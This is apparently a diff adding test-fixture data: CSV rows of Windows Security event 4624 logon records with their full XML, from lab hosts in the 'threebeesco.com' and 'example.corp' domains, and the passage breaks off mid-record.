+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:17.194652Z"">
+    </TimeCreated>
+    <EventRecordID>772611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""2996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1137987</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50107</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.870643Z"">
+    </TimeCreated>
+    <EventRecordID>772609</EventRecordID>
+    <Correlation ActivityID=""E671C39D-919D-0001-B2C3-71E69D91D601"">
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x244</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.697736Z"">
+    </TimeCreated>
+    <EventRecordID>772607</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1136e95</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50106</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-04-25T22:17:47.058172Z"">
+    </TimeCreated>
+    <EventRecordID>72742</EventRecordID>
+    <Correlation ActivityID=""6C67E3EE-58ED-0002-0DE4-676CED58D801"">
+    </Correlation>
+    <Execution ProcessID=""680"" ThreadID=""768"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>02694w-win10.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x8a38de</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">35D5E180-95BD-9ED7-7EFE-C355D7215A87</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50163</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-04-25T22:17:47.058172Z"">
+    </TimeCreated>
+    <EventRecordID>72742</EventRecordID>
+    <Correlation ActivityID=""6C67E3EE-58ED-0002-0DE4-676CED58D801"">
+    </Correlation>
+    <Execution ProcessID=""680"" ThreadID=""768"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>02694w-win10.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x8a38de</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">35D5E180-95BD-9ED7-7EFE-C355D7215A87</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50163</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-03-18T15:06:29.911579+04:00,1552907189.911579,4624,user01,EXAMPLE,9,seclogo,::1,,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:06:29.911579Z"">
+    </TimeCreated>
+    <EventRecordID>432903</EventRecordID>
+    <Correlation ActivityID=""661F2D37-D535-43F5-BAE0-06BE7E6614D7"">
+    </Correlation>
+    <Execution ProcessID=""524"" ThreadID=""2884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""SubjectUserName"">user01</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x18a7875</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""TargetUserName"">user01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x4530f0f</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x3ec</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:53.407618Z"">
+    </TimeCreated>
+    <EventRecordID>769798</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x85516e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">063B0961-D1B7-6D2C-1FF3-98764C4FAC9D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">53668</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:44.270428Z"">
+    </TimeCreated>
+    <EventRecordID>769794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x853237</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49959</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:16:19.989944Z"">
+    </TimeCreated>
+    <EventRecordID>563342</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x116c7b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">55589</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T02:16:09.458302+04:00,1552947369.458302,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.692401Z"">
+    </TimeCreated>
+    <EventRecordID>563300</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""TargetUserName"">user01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x110085</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">31E347DC-FF67-08B3-EADC-1EC267B1975B</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49249</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T02:15:49.676748+04:00,1552947349.676748,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,PC01,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.614293Z"">
+    </TimeCreated>
+    <EventRecordID>563297</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""3564"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x10fc09</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49249</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T02:15:49.614293+04:00,1552947349.614293,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.614293Z"">
+    </TimeCreated>
+    <EventRecordID>563294</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""3564"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
